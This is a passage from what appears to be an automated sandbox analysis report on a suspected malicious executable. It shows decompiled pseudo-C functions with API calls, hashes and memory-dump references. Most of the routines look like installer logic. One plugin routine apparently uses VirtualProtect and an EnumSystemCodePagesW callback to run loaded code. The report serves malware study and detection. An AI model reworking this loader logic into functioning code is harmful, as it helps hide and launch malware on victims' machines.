				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                        0x0040138a
                                                                                        0x004013fa
                                                                                        0x0040139b
                                                                                        0x004013a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004013a2
                                                                                        0x004013a3
                                                                                        0x004013ad
                                                                                        0x00000000
                                                                                        0x00401404
                                                                                        0x004013b0
                                                                                        0x004013b7
                                                                                        0x004013bd
                                                                                        0x004013be
                                                                                        0x004013c0
                                                                                        0x004013c2
                                                                                        0x004013b9
                                                                                        0x004013b9
                                                                                        0x004013ba
                                                                                        0x004013ba
                                                                                        0x004013c9
                                                                                        0x004013cb
                                                                                        0x004013f4
                                                                                        0x004013f4
                                                                                        0x004013c9
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                        • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                        • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                        • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 68%
                                                                                        			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                        0x00405841
                                                                                        0x0040584e
                                                                                        0x00405863
                                                                                        0x00405869

                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\SX365783909782021.exe,80000000,00000003), ref: 00405841
                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                        • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                        • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                        • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                        0x00405822
                                                                                        0x0040582b
                                                                                        0x00000000
                                                                                        0x00405834
                                                                                        0x0040583a

                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                        • Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
                                                                                        • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                        • Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 73762A38, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 44%
                                                                                        			E73762A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73764040 != 0 && E7376297D(_a4) == 0) {
					 *0x73764044 = _t93;
					if( *0x7376403c != 0) {
						_t93 =  *0x7376403c;
					} else {
						E73762F60(E73762977(), __ecx);
						 *0x7376403c = _t93;
					}
				}
				_t28 = E737629AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E7376299F();
					_t72 = _a4;
					_t79 =  *0x73764048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73764048 = _t72;
					E73762999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x7376401c = _t33;
					 *0x73764020 = _t79;
					if( *0x73764040 != 0 && E7376297D( *0x73764048) == 0) {
						 *0x7376403c = _t94;
						_t94 =  *0x73764044;
					}
					_t80 =  *0x73764048;
					_a4 = _t80;
					 *0x73764048 =  *((intOrPtr*)(E7376299F() + _t80));
					_t37 = E7376298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E737629AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E737629B6() + _a4 + _v8);
							_push(E737629C0());
							if( *0x73764040 <= 0 || E7376297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7376403c =  *0x7376403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73764048;
					if( *0x73764048 == 0) {
						 *0x7376403c = 0;
					}
					E737629E4(_t107, _a4,  *0x7376401c,  *0x73764020);
					return _a4;
				}
				_push(E737629B6() + _a4);
				_t56 = E737629BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E737629C8();
				_t87 = E737629C4();
				_t90 = E737629C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                        0x73762a48
                                                                                        0x73762a59
                                                                                        0x73762a66
                                                                                        0x73762a7a
                                                                                        0x73762a68
                                                                                        0x73762a6d
                                                                                        0x73762a72
                                                                                        0x73762a72
                                                                                        0x73762a66
                                                                                        0x73762a83
                                                                                        0x73762a88
                                                                                        0x73762a8e
                                                                                        0x73762ad2
                                                                                        0x73762ad2
                                                                                        0x73762ad7
                                                                                        0x73762adc
                                                                                        0x73762ae2
                                                                                        0x73762ae4
                                                                                        0x73762aea
                                                                                        0x73762af7
                                                                                        0x73762af9
                                                                                        0x73762afe
                                                                                        0x73762b0b
                                                                                        0x73762b1e
                                                                                        0x73762b24
                                                                                        0x73762b2a
                                                                                        0x73762b2b
                                                                                        0x73762b31
                                                                                        0x73762b3d
                                                                                        0x73762b43
                                                                                        0x73762b4b
                                                                                        0x73762b4c
                                                                                        0x73762b4f
                                                                                        0x73762b5a
                                                                                        0x73762b5c
                                                                                        0x73762b68
                                                                                        0x73762b6e
                                                                                        0x73762b76
                                                                                        0x73762ba2
                                                                                        0x73762ba3
                                                                                        0x73762ba5
                                                                                        0x73762ba9
                                                                                        0x73762ba9
                                                                                        0x73762bb0
                                                                                        0x73762b86
                                                                                        0x73762b86
                                                                                        0x73762b87
                                                                                        0x73762b95
                                                                                        0x73762b9e
                                                                                        0x73762b9e
                                                                                        0x73762b76
                                                                                        0x73762b5a
                                                                                        0x73762bb2
                                                                                        0x73762bb9
                                                                                        0x73762bbb
                                                                                        0x73762bbb
                                                                                        0x73762bd4
                                                                                        0x73762be2
                                                                                        0x73762be2
                                                                                        0x73762a99
                                                                                        0x73762a9a
                                                                                        0x73762a9f
                                                                                        0x73762aa3
                                                                                        0x73762aa8
                                                                                        0x73762abc
                                                                                        0x73762abd
                                                                                        0x73762abe
                                                                                        0x73762ac0
                                                                                        0x73762ac5
                                                                                        0x73762ac7
                                                                                        0x73762ac7
                                                                                        0x73762aca
                                                                                        0x73762ad0
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • EnumSystemCodePagesW.KERNELBASE(00000000), ref: 73762AF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CodeEnumPagesSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2369445336-0
                                                                                        • Opcode ID: d41b772868ae656633c8d7ec796ed5045a575c207d8a11f188f9670fbd046296
                                                                                        • Instruction ID: 192851354b02c90ac966eff04f8f0ae93b05a734c4b3b4527538cbe5c86ec2ae
                                                                                        • Opcode Fuzzy Hash: d41b772868ae656633c8d7ec796ed5045a575c207d8a11f188f9670fbd046296
                                                                                        • Instruction Fuzzy Hash: 4141C17390472EDFEB51EFA1D9B6B593778EB44310F244469EC09DB250D63894808FA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                        0x004031c3
                                                                                        0x004031d6
                                                                                        0x004031de
                                                                                        0x00000000
                                                                                        0x004031e5
                                                                                        0x00000000
                                                                                        0x004031e7

                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                        • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                        • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                        • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 73762921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73764038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7376404c, 4, 0x40, 0x7376403c); // executed
					 *0x7376404c = 0xc2;
					 *0x7376403c = 0;
					 *0x73764044 = 0;
					 *0x73764058 = 0;
					 *0x73764048 = 0;
					 *0x73764040 = 0;
					 *0x73764050 = 0;
					 *0x7376404e = 0;
				}
				return 1;
			}



                                                                                        0x7376292a
                                                                                        0x7376292f
                                                                                        0x7376293f
                                                                                        0x73762947
                                                                                        0x7376294e
                                                                                        0x73762953
                                                                                        0x73762958
                                                                                        0x7376295d
                                                                                        0x73762962
                                                                                        0x73762967
                                                                                        0x7376296c
                                                                                        0x7376296c
                                                                                        0x73762974

                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(7376404C,00000004,00000040,7376403C), ref: 7376293F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 0c242c7ac0e61487ce4e349e1279c6e4da70710a24de41e704bcdc1d928f3a70
                                                                                        • Instruction ID: fcb2cb6bada02aba16e088ce78bafa50206c9ff9af0128f902757dd88baea23f
                                                                                        • Opcode Fuzzy Hash: 0c242c7ac0e61487ce4e349e1279c6e4da70710a24de41e704bcdc1d928f3a70
                                                                                        • Instruction Fuzzy Hash: F7F092B3508BBBDEC361EF6A85667053EE0A319254F2145AAE59CDF241E33C40488B11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                        0x004031ff
                                                                                        0x00403205

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                        • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                        • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                        • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 7376101B, Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 16%
                                                                                        			E7376101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E737614BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E737614E2();
			}





                                                                                        0x7376101b
                                                                                        0x73761022
                                                                                        0x7376102f
                                                                                        0x73761035
                                                                                        0x73761024
                                                                                        0x73761024
                                                                                        0x73761024
                                                                                        0x7376103c

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,73761019,00000001), ref: 7376102F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AllocGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 3761449716-0
                                                                                        • Opcode ID: c5f62e1fdaadd96a716f9858ed52d3b7277abb5e276842165865738ea7d636c5
                                                                                        • Instruction ID: 4da99aec9707f05717fc1f584c85e4f8c05e040a578c104f52225a6358ceb220
                                                                                        • Opcode Fuzzy Hash: c5f62e1fdaadd96a716f9858ed52d3b7277abb5e276842165865738ea7d636c5
                                                                                        • Instruction Fuzzy Hash: 2FC08CB2400747FBFA1092F68B6DF1A2AAC8B48241F20C400FE46CB0C0DA28C1009230
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 73761215, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E73761215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x7376405c); // executed
				return _t1;
			}




                                                                                        0x7376121d
                                                                                        0x73761223

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNELBASE(00000040,73761233,?,737612CF,-7376404B,737611AB,-000000A0), ref: 7376121D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AllocGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 3761449716-0
                                                                                        • Opcode ID: 6bc2b022e9787f6f9f1edc13ef4333109d963d0fdb61a1df0a9e8c2abb9a20ca
                                                                                        • Instruction ID: 52436babf78241069aabecf8541410051d20355bd3a2d7dc6f1cc09b0207444e
                                                                                        • Opcode Fuzzy Hash: 6bc2b022e9787f6f9f1edc13ef4333109d963d0fdb61a1df0a9e8c2abb9a20ca
                                                                                        • Instruction Fuzzy Hash: 39A00273D44B2ADBEE45BBE28A2BF143B22E748701F208080E35D5C1A4C67E8014DB35
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                        0x0040504b
                                                                                        0x00405051
                                                                                        0x0040505a
                                                                                        0x0040505d
                                                                                        0x004051f5
                                                                                        0x00405219
                                                                                        0x00405219
                                                                                        0x0040522c
                                                                                        0x0040524a
                                                                                        0x00405251
                                                                                        0x004052a8
                                                                                        0x004052ac
                                                                                        0x00000000
                                                                                        0x004052b3
                                                                                        0x004052bb
                                                                                        0x004052c3
                                                                                        0x004052c6
                                                                                        0x004053bf
                                                                                        0x00000000
                                                                                        0x004053bf
                                                                                        0x004052d5
                                                                                        0x004052e1
                                                                                        0x004052e7
                                                                                        0x004052ed
                                                                                        0x00405302
                                                                                        0x00405308
                                                                                        0x004052ef
                                                                                        0x004052f4
                                                                                        0x004052fa
                                                                                        0x004052fd
                                                                                        0x004052fd
                                                                                        0x00405318
                                                                                        0x00405320
                                                                                        0x00405323
                                                                                        0x0040532c
                                                                                        0x0040532f
                                                                                        0x00405336
                                                                                        0x0040533d
                                                                                        0x00405345
                                                                                        0x00405345
                                                                                        0x0040535c
                                                                                        0x0040535c
                                                                                        0x00405363
                                                                                        0x00405369
                                                                                        0x00405372
                                                                                        0x00405379
                                                                                        0x00405382
                                                                                        0x00405384
                                                                                        0x00405387
                                                                                        0x00405396
                                                                                        0x00405398
                                                                                        0x0040539e
                                                                                        0x0040539f
                                                                                        0x004053a0
                                                                                        0x004053a8
                                                                                        0x004053b3
                                                                                        0x004053b9
                                                                                        0x004053b9
                                                                                        0x00000000
                                                                                        0x00405323
                                                                                        0x004052ac
                                                                                        0x00405259
                                                                                        0x00405289
                                                                                        0x00405291
                                                                                        0x0040529c
                                                                                        0x0040529c
                                                                                        0x004052a3
                                                                                        0x00000000
                                                                                        0x004052a3
                                                                                        0x0040525d
                                                                                        0x00405267
                                                                                        0x00000000
                                                                                        0x0040522e
